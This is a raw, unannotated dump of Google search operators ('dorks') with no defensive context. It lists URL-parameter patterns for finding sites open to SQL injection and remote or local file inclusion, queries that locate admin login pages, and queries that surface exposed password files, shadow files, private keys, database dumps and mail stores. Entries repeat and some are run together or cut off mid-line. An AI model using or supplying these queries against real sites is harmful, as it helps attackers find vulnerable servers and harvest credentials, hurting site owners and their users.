cmd.php?arg= .php?arg=
/codebb/lang_select?phpbb_root_path= codebb
/codebb/lang_select?phpbb_root_path= codebb 1.1b3
components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= rs gery
components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= rsgery
components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= rsgery.php
content.php?inc= .php?inc=”
content.php?seite= content.php?seite=
content.php?seite= .php?seite=
dbase.php?action= dbase.php
dbase.php?action= dbase.php?action=
dbase.php?action= .php?action=
default.php?arquivo= .php?arquivo=
default.php?vis= .php?vis=”
define.php?term= .php?term=”
detail.php?prod= detail.php?prod=”
detail.php?prod= .php?prod=”
details.php?loc= details.php?loc=
details.php?loc= .php?loc=
directions.php?loc= directions.php?loc=
direct.php?loc= direct.php?loc=
display.php?f= display.php?f=
display.php?file= display.php?file=
display.php?lang= display.php?lang=
display.php?l= display.php?l=
display.php?ln= display.php?ln=
display.php?pag= display.php?pag=
display.php?page= display.php?page=”
display.php?page= .php?page=”
display.php?page=&lang= display.php?page=”
display.php?page=&lang= .php?page=”
display.php?p= display.php?p=
display.php?pg= display.php?pg=
display.php?s= display.php?s=
display.php?table= display.php?table=
display.php?table= .php?table=
download.php?sub= “download.php?sub=”
download.php?sub= download.php?sub=
eng.php?img= eng.php?img=
eng.php?img= .php?img=
/exibir.php?arquivo= .php?arquivo=
experts.php?sub= “experts.php?sub=”
experts.php?sub= experts.php?sub=
forum.php?seite= .php?seite=
frag.php?exec= frag.php”
frag.php?exec= frag.php?exec=”
frag.php?exec= .php?exec=”
frame.php?loc= .php?loc=”
galerie.php?do= .php?do=”
glossary.php?term= .php?term=”
handlinger.php?vis= .php?vis=”
/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY= PHP Ged View
/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY= PHP GedView
/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY= PHPGedView
/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY= PHPGedView <= 3.3.7 home1.php?ln= .php?ln= home2.php?ln= .php?ln= home.php?a= home.php?a=” home.php?a= .php?a=” home.php?act= “home.php?act=” home.php?act= home.php?act= home.php?arg= .php?arg= home.php?func= .php?func=” home.php?i= “home.php?i=” home.php?i= home.php?i= home.php?inc= “home.php?inc=” home.php?inc= home.php?inc= home.php?ln= .php?ln= home.php?ltr= .php?ltr=” home.php?sit= .php?sit=” home.php?table= .php?table= image.php?img= image.php?img= image.php?img= .php?img= img.php?loc= img.php?loc=” img.php?loc= .php?loc=” inc.php?inc= .php?inc=” index1.php?arg= .php?arg= index1.php?arq= .php?arq= index1.php?func= .php?func=” index1.php?inc= .php?inc=” index1.php?lk= .php?lk=” /index1.php?ln= .php?ln= index1.php?ltr= .php?ltr=” index1.php?mid= index1.php?mid= index1.php?page= index1.php?page=” index1.php?p= .php?p=” index1.php?p= .php?pag=” index1.php?p= .php?page=” index1.php?p= .php?pg=” index1.php?s= index1.php?s=” index1.php?show= index1.php?show=” index1.php?show= .php?show=” index1.php?table= .php?table= index2.php?arg= .php?arg= index2.php?arq= .php?arq= index2.php?c= index2.php?c=” index2.php?c= .php?c=” index2.php?cont= index2.php?cont=” index2.php?cont= .php?cont=” index2.php?content= index2.php?cont=” index2.php?content= index2.php?content=” index2.php?content= .php?content=” index2.php?content= index2.php?content= index2.php?content= .php?content= index2.php?i= /index2.php?i= index2.php?inc= .php?inc=” index2.php?l= .php?l=” index2.php?lg= index.php?lg=” index2.php?lk= .php?lk=” index2.php?ln= index.php?ln=” index2.php?ln= .php?ln=” index2.php?lng= index.php?lng=” index2.php?loca= index2.php?loca= index2.php?loca= .php?loca= index2.php?meio= .php?meio= index2.php?s= index2.php?s=” index2.php?s= .php?s=” index2.php?table= .php?table= index2.php?x= index2.php?x= index2.php?x= .php?x= index.php3?act= index.php3?act= index.php3?act= .php3?act= inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurl:play_old.php?id= inurl:declaration_more.ph p?decl_id= inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?nu m= inurl:reagir.php?num= inurl:Stray-Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id = inurl:newsone.php?id= inurl:sw_comment.php?id= inurl:news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl:select_biblio.php?i d= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id = inurl:fiche_spectacle.php ?id= inurl:communique_detail.p hp?id= inurl:sem.php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view.php?id= inurl:website.php?id= inurl:hosting_info.php?id = inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php?id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.ph p?id = inurl:category.php?id= inurl:publications.php?id = inurl:fellows.php?id= inurl:downloads_info.php? id= inurl:prod_info.php?id= inurl:shop.php?do=part&id = inurl:productinfo.php?id= inurl:collectionitem.php? id= inurl:band_info.php?id= inurl:product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail.php?i d= inurl:post.php?id= inurl:viewshowdetail.php? id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?i d= inurl:product_ranges_view .php?ID= inurl:shop_category.php?i d= inurl:transcript.php?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?ge tid= inurl:index2.php?option= inurl:readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php?ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php ?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl:offer.php?idf= inurl:art.php?idm= inurl:title.php?id= inurl:”.php?id=1″ inurl:”.php?cat=1″ inurl:”.php?catid=1″ inurl:”.php?num=1″ inurl:”.php?bid=1″ inurl:”.php?pid=1″ inurl:”.php?nid=1″ RFI (Remote File Inclusion): inurl:/_functions.php?prefix= inurl:/cpcommerce/_functions.php?prefix= inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR= inurl:/modules/agendax/addevent.inc.php?agendax_ path= inurl:/ashnews.php?pathtoashnews = inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]= inurl:/pm/lib.inc.php?pm_path= inurl:/b2-tools/gm-2-b2.php?b2inc= inurl:/modules/mod_mainmenu.php?mosConfi g_absolute_path= inurl:/modules/agendax/addevent.inc.php?agendax_ path= inurl:/includes/include_once.php?include_ file= inurl:/e107/e107_handlers/secure_img_render.php?p= inurl:/shoutbox/expanded.php?conf= inurl:/main.php?x= inurl:/myPHPCalendar/admin.php?cal_dir= inurl:/index.php/main.php?x= inurl:/index.php?include= inurl:/index.php?x= inurl:/index.php?open= inurl:/index.php?visualizar= inurl:/template.php?pagina= inurl:/index.php?pagina= inurl:/index.php?inc= inurl:/includes/include_onde.php?include_ file= inurl:/index.php?page= inurl:/index.php?pg= inurl:/index.php?show= inurl:/index.php?cat= inurl:/index.php?file= inurl:/db.php?path_local= inurl:/index.php?site= inurl:/htmltonuke.php?filnavn= inurl:/livehelp/inc/pipe.php?HCL_path= inurl:/hcl/inc/pipe.php?HCL_path= inurl:/inc/pipe.php?HCL_path= inurl:/support/faq/inc/pipe.php?HCL_path= inurl:/help/faq/inc/pipe.php?HCL_path= inurl:/helpcenter/inc/pipe.php?HCL_path= inurl:/live-support/inc/pipe.php?HCL_path= inurl:/gnu3/index.php?doc= inurl:/gnu/index.php?doc= inurl:/phpgwapi/setup/tables_update.inc.php?app dir= inurl:/forum/install.php?phpbb_root_di r= inurl:/includes/calendar.php?phpc_root_pa th= inurl:/includes/setup.php?phpc_root_path= inurl:/inc/authform.inc.php?path_pre = inurl:/include/authform.inc.php?path_pre = inurl:index.php?nic= inurl:index.php?sec= inurl:index.php?content= inurl:index.php?link= inurl:index.php?filename= inurl:index.php?dir= inurl:index.php?document= inurl:index.php?view= inurl:*.php?sel= inurl:*.php?session=&cont ent= inurl:*.php?locate= inurl:*.php?place= inurl:*.php?layout= inurl:*.php?go= inurl:*.php?catch= inurl:*.php?mode= inurl:*.php?name= inurl:*.php?loc= inurl:*.php?f= inurl:*.php?inf= inurl:*.php?pg= inurl:*.php?load= inurl:*.php?naam= allinurl:/index.php?page= site:*.ru allinurl:/index.php?file= site:*.ru[/spoiler] INURL: or ALLINURL: types:[/color] /temp_eg/phpgwapi/setup/tables_update.inc.php?app dir= /includes/header.php?systempath= /Gallery/displayCategory.php?basep ath= /index.inc.php?PATH_Includ es= /ashnews.php?pathtoashnews = /ashheadlines.php?pathtoas hnews= /modules/xgallery/upgrade_album.php?GALLERY _BASEDIR= /demo/includes/init.php?user_inc= /jaf/index.php?show= /inc/shows.inc.php?cutepath= /poll/admin/common.inc.php?base_path= /pollvote/pollvote.php?pollname= /sources/post.php?fil_config= /modules/My_eGallery/public/displayCategory.php?basep ath= /bb_lib/checkdb.inc.php?libpach= /include/livre_include.php?no_conn ect=lol&chem_absolu= /index.php?from_market=Y&p ageurl= /modules/mod_mainmenu.php?mosConfi g_absolute_path= /pivot/modules/module_db.php?pivot_path= /modules/4nAlbum/public/displayCategory.php?basep ath= /derniers_commentaires.php ?rep= /modules/coppermine/themes/default/theme.php?THEME_DIR= /modules/coppermine/include/init.inc.php?CPG_M_DIR= /modules/coppermine/themes/coppercop/theme.php?THEME_DIR= /coppermine/themes/maze/theme.php?THEME_DIR= /allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]= /allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]= /myPHPCalendar/admin.php?cal_dir= /agendax/addevent.inc.php?agendax_ path= /modules/mod_mainmenu.php?mosConfi g_absolute_path= /modules/xoopsgallery/upgrade_album.php?GALLERY _BASEDIR= /main.php?page= /default.php?page= /index.php?action= /index1.php?p= /index2.php?x= /index2.php?content= /index.php?conteudo= /index.php?cat= /include/new-visitor.inc.php?lvc_inclu de_dir= /modules/agendax/addevent.inc.php?agendax_ path= /shoutbox/expanded.php?conf= /modules/xgallery/upgrade_album.php?GALLERY _BASEDIR= /pivot/modules/module_db.php?pivot_path= /library/editor/editor.php?root= /library/lib.php?root= /e107/e107_handlers/secure_img_render.php?p= /zentrack/index.php?configFile= /main.php?x= /becommunity/community/index.php?pageurl= /GradeMap/index.php?page= /index4.php?body= /side/index.php?side= /main.php?page= /es/index.php?action= /index.php?sec= /index.php?main= /index.php?sec= /index.php?menu= /html/page.php?page= /page.php?view= /index.php?menu= /main.php?view= /index.php?page= /content.php?page= /main.php?page= /index.php?x= /main_site.php?page= /index.php?L2= /content.php?page= /main.php?page= /index.php?x= /main_site.php?page= /index.php?L2= /index.php?show= /tutorials/print.php?page= /index.php?page= /index.php?level= /index.php?file= /index.php?inter_url= /index.php?page= /index2.php?menu= /index.php?level= /index1.php?main= /index1.php?nav= /index1.php?link= /index2.php?page= /index.php?myContent= /index.php?TWC= /index.php?sec= /index1.php?main= /index2.php?page= /index.php?****nstallPath= /main.php?body= /index.php?z= /main.php?view= /modules/PNphpBB2/includes/functions_admin.php?phpbb _root_path= /index.php?file= /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]= LFI (Local File Inclusion): acion= act= action= API_HOME_DIR= board= cat= client_id= cmd= cont= current_frame= date= detail= dir= display= download= f= file= fileinclude= filename= firm_id= g= getdata= go= HT= idd= inc= incfile= incl= include_file= include_path= infile= info= ir= lang= language= link= load= main= mainspot= msg= num= openfile= p= page= pagina= path= path_to_calendar= pg= plik qry_str= ruta= safehtml= section= showfile= side= site_id= skin= static= str= strona= sub= tresc= url= user= intext:””BiTBOARD v2.0″ BiTSHiFTERS Bulletin Board” intext:”Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed.” -edu intext:”Mail admins login here to administrate your domain.” intext:”Master Account” “Domain Name” “Password” inurl:/cgi-bin/qmailadmin intext:”Master Account” “Domain Name” “Password” inurl:/cgi-bin/qmailadmin intext:”Storage Management Server for” intitle:”Server Administration” intext:”Welcome to” inurl:”cp” intitle:”H-SPHERE” inurl:”begin.html” -Fee intext:”vbulletin” inurl:admincp intitle:”*- HP WBEM Login” | “You are being prompted to provide login account information for *” | “Please provide the information requested and press intitle:”Admin Login” “admin login” “blogware” intitle:”Admin login” “Web Site Administration” “Copyright” intitle:”AlternC Desktop” intitle:”Athens Authentication Point” intitle:”b2evo > Login form” “Login form. You must log in! You will have to accept cookies in order to log in” -demo -site:b2evolution.net
intitle:”Cisco CallManager User Options Log On” “Please enter your User ID and Password in the spaces provided below and click the Log On button to co
intitle:”ColdFusion Administrator Login”Original source link: http://www.binushacker.net/sqli-dork-rfi-dork-lfi-dork.html
intitle:”communigate pro * *” intitle:”entrance”
intitle:”Content Management System” “user name”|”password”|”admin” “Microsoft IE 5.5″ -mambo
intitle:”Content Management System” “user name”|”password”|”admin” “Microsoft IE 5.5″ -mambo
intitle:”Dell Remote Access Controller”
intitle:”Docutek ERes – Admin Login” -edu
intitle:”Employee Intranet Login”
intitle:”eMule *” intitle:”- Web Control Panel” intext:”Web Control Panel” “Enter your password here.”
intitle:”ePowerSwitch Login”
intitle:”eXist Database Administration” -demo
intitle:”EXTRANET * – Identification”
intitle:”EXTRANET login” -.edu -.mil -.gov
intitle:”EZPartner” -netpond
intitle:”Flash Operator Panel” -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists
intitle:”i-secure v1.1″ -edu
intitle:”Icecast Administration Admin Page”
intitle:”iDevAffiliate – admin” -demo
intitle:”ISPMan : Unauthorized Access prohibited”
intitle:”ITS System Information” “Please log on to the SAP System”
intitle:”Kurant Corporation StoreSense” filetype:bok
intitle:”ListMail Login” admin -demo
intitle:”Login -
intitle:”Login to @Mail” (ext:pl | inurl:”index”) -dwaffleman
intitle:”Login to Cacti”
intitle:”Login to the forums – @www.aimoo.com” inurl:login.cfm?id=
intitle:”MailMan Login”
intitle:”Member Login” “NOTE: Your browser must have cookies enabled in order to log into the site.” ext:php OR ext:cgi
intitle:”Merak Mail Server Web Administration” -ihackstuff.com
intitle:”microsoft certificate services” inurl:certsrv
intitle:”MikroTik RouterOS Managing Webpage”
intitle:”MX Control Console” “If you can’t remember”
intitle:”Novell Web Services” “GroupWise” -inurl:”doc/11924″ -.mil -.edu -.gov -filetype:pdf
intitle:”Novell Web Services” intext:”Select a service and a language.”
intitle:”oMail-admin Administration – Login” -inurl:omnis.ch
intitle:”OnLine Recruitment Program – Login”
intitle:”Philex 0.2*” -s?ri?t -site:freelists.org
intitle:”PHP Advanced Transfer” inurl:”login.php”
intitle:”php icalendar administration” -site:sourceforge.net
intitle:”php icalendar administration” -site:sourceforge.net
intitle:”phpPgAdmin – Login” Language
intitle:”PHProjekt – login” login password
intitle:”please login” “your password is *”
intitle:”Remote Desktop Web Connection” inurl:tsweb
intitle:”SFXAdmin – sfx_global” | intitle:”SFXAdmin – sfx_local” | intitle:”SFXAdmin – sfx_test”
intitle:”SHOUTcast Administrator” inurl:admin.cgi
intitle:”site administration: please log in” “site designed by emarketsouth”
intitle:”Supero Doctor III” -inurl:supermicro
intitle:”SuSE Linux Openexchange Server” “Please activate Javas?ri?t!”
intitle:”teamspeak server-administration
intitle:”Tomcat Server Administration”
intitle:”TOPdesk ApplicationServer”
intitle:”TUTOS Login”
intitle:”TWIG Login”
intitle:”vhost” intext:”vHost . 2000-2004″
intitle:”Virtual Server Administration System”
intitle:”VisNetic WebMail” inurl:”/mail/”
intitle:”VitalQIP IP Management System”
intitle:”VMware Management Interface:” inurl:”vmware/en/”
intitle:”VNC viewer for Java”
intitle:”web-cyradm”|”by Luc de Louw” “This is only for authorized users” -tar.gz -site:web-cyradm.org
intitle:”WebLogic Server” intitle:”Console Login” inurl:console
intitle:”Welcome Site/User Administrator” “Please select the language” -demos
intitle:”Welcome to Mailtraq WebMail”
intitle:”welcome to netware *” -site:novell.com
intitle:”WorldClient” intext:”? (2003|2004) Alt-N Technologies.”
intitle:”xams 0.0.0..15 – Login”
intitle:”XcAuctionLite” | “DRIVEN BY XCENT” Lite inurl:admin
intitle:”XMail Web Administration Interface” intext:Login intext:password
intitle:”Zope Help System” inurl:HelpSys
intitle:”ZyXEL Prestige Router” “Enter password”
intitle:”inc. vpn 3000 concentrator”
intitle:(“TrackerCam Live Video”)|(“TrackerCam Application Login”)|(“Trackercam Remote”) -trackercam.com
intitle:asterisk.management.portal web-access
intitle:endymion.sak?.mail.login.page | inurl:sake.servlet
intitle:Group-Office “Enter your username and password to login”
intitle:ilohamail “
IlohaMail”
intitle:ilohamail intext:”Version 0.8.10″ “
IlohaMail”
intitle:IMP inurl:imp/index.php3
intitle:Login * Webmailer
intitle:Login intext:”RT is ? Copyright”
intitle:Node.List Win32.Version.3.11
intitle:Novell intitle:WebAccess “Copyright *-* Novell, Inc”
intitle:open-xchange inurl:login.pl
intitle:Ovislink inurl:private/login
intitle:phpnews.login
intitle:plesk inurl:login.php3
inurl:”/admin/configuration. php?” Mystore
inurl:”/slxweb.dll/external?name=(custportal|webticketcust)”
inurl:”1220/parse_xml.cgi?”
inurl:”631/admin” (inurl:”op=*”) | (intitle:CUPS)
inurl:”:10000″ intext:webmin
inurl:”Activex/default.htm” “Demo”
inurl:”calendar.asp?action=login”
inurl:”default/login.php” intitle:”kerio”
inurl:”gs/adminlogin.aspx”
inurl:”php121login.php”
inurl:”suse/login.pl”
inurl:”typo3/index.php?u=” -demo
inurl:”usysinfo?login=true”
inurl:”utilities/TreeView.asp”
inurl:”vsadmin/login” | inurl:”vsadmin/admin” inurl:.php|.asp
inurl:/admin/login.asp
inurl:/cgi-bin/sqwebmail?noframes=1
inurl:/Citrix/Nfuse17/
inurl:/dana-na/auth/welcome.html
inurl:/eprise/
inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc | intitle:”Miva Merchant Administration Login” -inurl:cheap-malboro.net
inurl:/modcp/ intext:Moderator+vBulletin
inurl:/SUSAdmin intitle:”Microsoft Software upd?t? Services”
inurl:/webedit.* intext:WebEdit Professional -html
inurl:1810 “Oracle Enterprise Manager”
inurl:2000 intitle:RemotelyAnywhere -site:realvnc.com
inurl::2082/frontend -demo
inurl:administrator “welcome to mambo”
inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0
inurl:cgi-bin/ultimatebb.cgi?ubb=login
inurl:Citrix/MetaFrame/default/default.aspx
inurl:confixx inurl:login|anmeldung
inurl:coranto.cgi intitle:Login (Authorized Users Only)
inurl:csCreatePro.cgi
inurl:default.asp intitle:”WebCommander”
inurl:exchweb/bin/auth/owalogon.asp
inurl:gnatsweb.pl
inurl:ids5web
inurl:irc filetype:cgi cgi:irc
inurl:login filetype:swf swf
inurl:login.asp
inurl:login.cfm
inurl:login.php “SquirrelMail version”
inurl:metaframexp/default/login.asp | intitle:”Metaframe XP Login”
inurl:mewebmail
inurl:names.nsf?opendatabase
inurl:ocw_login_username
inurl:orasso.wwsso_app_admin.ls_login
inurl:postfixadmin intitle:”postfix admin” ext:php
inurl:search/admin.php
inurl:textpattern/index.php
inurl:WCP_USER
inurl:webmail./index.pl “Interface”
inurl:webvpn.html “login” “Please enter your”
filetype:bak createobject sa
filetype:bak inurl:”htaccess|passwd|shadow|htusers”
filetype:cfg mrtg “target
filetype:cfm “cfapplication name” password
filetype:conf oekakibbs
filetype:conf slapd.conf
filetype:config config intext:appSettings “User ID”
filetype:dat “password.dat”
filetype:dat inurl:Sites.dat
filetype:dat wand.dat
filetype:inc dbconn
filetype:inc intext:mysql_connect
filetype:inc mysql_connect OR mysql_pconnect
filetype:inf sysprep
filetype:ini inurl:”serv-u.ini”
filetype:ini inurl:flashFXP.ini
filetype:ini ServUDaemon
filetype:ini wcx_ftp
filetype:ini ws_ftp pwd
filetype:ldb admin
filetype:log “See `ipsec –copyright”
filetype:log inurl:”password.log”
filetype:mdb inurl:users.mdb
filetype:mdb wwforum
filetype:netrc password
filetype:pass pass intext:userid
filetype:pem intext:private
filetype:properties inurl:db intext:password
filetype:pwd service
filetype:pwl pwl
filetype:reg reg +intext:”defaultusername” +intext:”defaultpassword”
filetype:reg reg +intext:รข? WINVNC3รข?
filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS
filetype:sql “insert into” (pass|passwd|password)
filetype:sql (“values * MD5″ | “values * password” | “values * encrypt”)
filetype:sql +”IDENTIFIED BY” -cvs
filetype:sql password
filetype:url +inurl:”ftp://” +inurl:”;@”
filetype:xls username password email
htpasswd
htpasswd / htgroup
htpasswd / htpasswd.bak
intext:”enable password 7″
intext:”enable secret 5 $”
intext:”EZGuestbook”
intext:”Web Wiz Journal”
intitle:”index of” intext:connect.inc
intitle:”index of” intext:globals.inc
intitle:”Index of” passwords modified
intitle:”Index of” sc_serv.conf sc_serv content
intitle:”phpinfo()” +”mysql.default_password” +”Zend s?ri?ting Language Engine”
intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com
intitle:index.of administrators.pwd
intitle:Index.of etc shadow
intitle:index.of intext:”secring.skr”|”secring.pgp”|”secring.bak”
intitle:rapidshare intext:login
inurl:”calendars?ri?t/users.txt”
inurl:”editor/list.asp” | inurl:”database_editor.asp” | inurl:”login.asa” “are set”
inurl:”GRC.DAT” intext:”password”
inurl:”Sites.dat”+”PASS=”
inurl:”slapd.conf” intext:”credentials” -manpage -”Manual Page” -man: -sample
inurl:”slapd.conf” intext:”rootpw” -manpage -”Manual Page” -man: -sample
inurl:”wvdial.conf” intext:”password”
inurl:/db/main.mdb
inurl:/wwwboard
inurl:/yabb/Members/Admin.dat
inurl:ccbill filetype:log
inurl:cgi-bin inurl:calendar.cfg
inurl:chap-secrets -cvs
inurl:config.php dbuname dbpass
inurl:filezilla.xml -cvs
inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man
inurl:nuke filetype:sql
inurl:ospfd.conf intext:password -sample -test -tutorial -download
inurl:pap-secrets -cvs
inurl:pass.dat
inurl:perform filetype:ini
inurl:perform.ini filetype:ini
inurl:secring ext:skr | ext:pgp | ext:bak
inurl:server.cfg rcon password
inurl:ventrilo_srv.ini adminpassword
inurl:vtund.conf intext:pass -cvs
inurl:zebra.conf intext:password -sample -test -tutorial -download
filetype:bkf bkf
filetype:blt “buddylist”
filetype:blt blt +intext:screenname
filetype:cfg auto_inst.cfg
filetype:cnf inurl:_vti_pvt access.cnf
filetype:conf inurl:firewall -intitle:cvs
filetype:config web.config -CVS
filetype:ctt Contact
filetype:ctt ctt messenger
filetype:eml eml +intext:”Subject” +intext:”From” +intext:”To”
filetype:fp3 fp3
filetype:fp5 fp5 -site:gov -site:mil -”cvs log”
filetype:fp7 fp7
filetype:inf inurl:capolicy.inf
filetype:lic lic intext:key
filetype:log access.log -CVS
filetype:log cron.log
filetype:mbx mbx intext:Subject
filetype:myd myd -CVS
filetype:ns1 ns1
filetype:ora ora
filetype:ora tnsnames
filetype:pdb pdb backup (Pilot | Pluckerdb)
filetype:php inurl:index inurl:phpicalendar -site:sourceforge.net
filetype:pot inurl:john.pot
filetype:PS ps
filetype:pst inurl:”outlook.pst”
filetype:pst pst -from -to -date
filetype:qbb qbb
filetype:QBW qbw
filetype:rdp rdp
filetype:reg “Terminal Server Client”
filetype:vcs vcs
filetype:wab wab
filetype:xls -site:gov inurl:contact
filetype:xls inurl:”email.xls”
Financial spreadsheets: finance.xls
Financial spreadsheets: finances.xls
Ganglia Cluster Reports
haccess.ctl (one way)
haccess.ctl (VERY reliable)
ICQ chat logs, please…
intext:”Session Start * * * *:*:* *” filetype:log
intext:”Tobias Oetiker” “traffic analysis”
intext:(password | passcode) intext:(username | userid | user) filetype:csv
intext:gmail invite intext:http://gmail.google.com/gmail/a
intext:SQLiteManager inurl:main.php
intext:ViewCVS inurl:Settings.php
intitle:”admin panel” +”RedKernel”
intitle:”Apache::Status” (inurl:server-status | inurl:status.html | inurl:apache.html)
intitle:”AppServ Open Project” -site:www.appservnetwork.com
intitle:”ASP Stats Generator *.*” “ASP Stats Generator” “2003-2004 weppos”
intitle:”Big Sister” +”OK Attention Trouble”
intitle:”curriculum vitae” filetype:doc
intitle:”edna:streaming mp3 server” -forums
intitle:”FTP root at”
intitle:”index of” +myd size
intitle:”Index Of” -inurl:maillog maillog size
intitle:”Index Of” cookies.txt size
intitle:”index of” mysql.conf OR mysql_config
intitle:”Index of” upload size parent directory
intitle:”index.of *” admin news.asp configview.asp
intitle:”index.of” .diz .nfo last modified
intitle:”Joomla – Web Installer”
intitle:”LOGREP – Log file reporting system” -site:itefix.no
intitle:”Multimon UPS status page”
intitle:”PHP Advanced Transfer” (inurl:index.php | inurl:showrecent.php )
intitle:”PhpMyExplorer” inurl:”index.php” -cvs
intitle:”statistics of” “advanced web statistics”
intitle:”System Statistics” +”System and Network Information Center”
intitle:”urchin (5|3|admin)” ext:cgi
intitle:”Usage Statistics for” “Generated by Webalizer”
intitle:”wbem” compaq login “Compaq Information Technologies Group”
intitle:”Web Server Statistics for ****”
intitle:”web server status” SSH Telnet
intitle:”Welcome to F-Secure Policy Manager Server Welcome Page”
intitle:”welcome.to.squeezebox”
intitle:admin intitle:login
intitle:Bookmarks inurl:bookmarks.html “Bookmarks
intitle:index.of “Apache” “server at”
intitle:index.of cleanup.log
intitle:index.of dead.letter
intitle:index.of inbox
intitle:index.of inbox dbx
intitle:index.of ws_ftp.ini
intitle:intranet inurl:intranet +intext:”phone”
inurl:”/axs/ax-admin.pl” -script
inurl:”/cricket/grapher.cgi”
inurl:”bookmark.htm”
inurl:”cacti” +inurl:”graph_view.php” +”Settings Tree View” -cvs -RPM
inurl:”newsletter/admin/”
inurl:”newsletter/admin/” intitle:”newsletter admin”
inurl:”putty.reg”
inurl:”smb.conf” intext:”workgroup” filetype:conf conf
inurl:*db filetype:mdb
inurl:/cgi-bin/pass.txt
inurl:/_layouts/settings
inurl:admin filetype:xls
inurl:admin intitle:login
inurl:backup filetype:mdb
inurl:build.err
inurl:cgi-bin/printenv
inurl:cgi-bin/testcgi.exe “Please distribute TestCGI”
inurl:changepassword.asp
inurl:ds.py
inurl:email filetype:mdb
inurl:fcgi-bin/echo
inurl:forum filetype:mdb
inurl:forward filetype:forward -cvs
inurl:getmsg.html intitle:hotmail
inurl:log.nsf -gov
inurl:main.php phpMyAdmin
inurl:main.php Welcome to phpMyAdmin
inurl:netscape.hst
inurl:netscape.hst
inurl:netscape.ini
inurl:odbc.ini ext:ini -cvs
inurl:perl/printenv
inurl:php.ini filetype:ini
inurl:preferences.ini “[emule]“
inurl:profiles filetype:mdb
inurl:report “EVEREST Home Edition “
inurl:server-info “Apache Server Information”
inurl:server-status “apache”
inurl:snitz_forums_2000.mdb
inurl:ssl.conf filetype:conf
inurl:tdbin
inurl:vbstats.php “page generated”
inurl:wp-mail.php + “There doesn’t seem to be any new mail.”
inurl:XcCDONTS.asp
intext:””BiTBOARD v2.0″ BiTSHiFTERS Bulletin Board”
intext:”Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed.” -edu
intext:”Mail admins login here to administrate your domain.”
intext:”Master Account” “Domain Name” “Password” inurl:/cgi-bin/qmailadmin
intext:”Master Account” “Domain Name” “Password” inurl:/cgi-bin/qmailadmin
intext:”Storage Management Server for” intitle:”Server Administration”
intext:”Welcome to” inurl:”cp” intitle:”H-SPHERE” inurl:”begin.html” -Fee
intext:”vbulletin” inurl:admincp
intitle:”*- HP WBEM Login” | “You are being prompted to provide login account information for *” | “Please provide the information requested and press
intitle:”Admin Login” “admin login” “blogware”
intitle:”Admin login” “Web Site Administration” “Copyright”
intitle:”AlternC Desktop”
intitle:”Athens Authentication Point”
intitle:”b2evo > Login form” “Login form. You must log in! You will have to accept cookies in order to log in” -demo -site:b2evolution.net
intitle:”Cisco CallManager User Options Log On” “Please enter your User ID and Password in the spaces provided below and click the Log On button to co
intitle:”ColdFusion Administrator Login”
intitle:”communigate pro * *” intitle:”entrance”
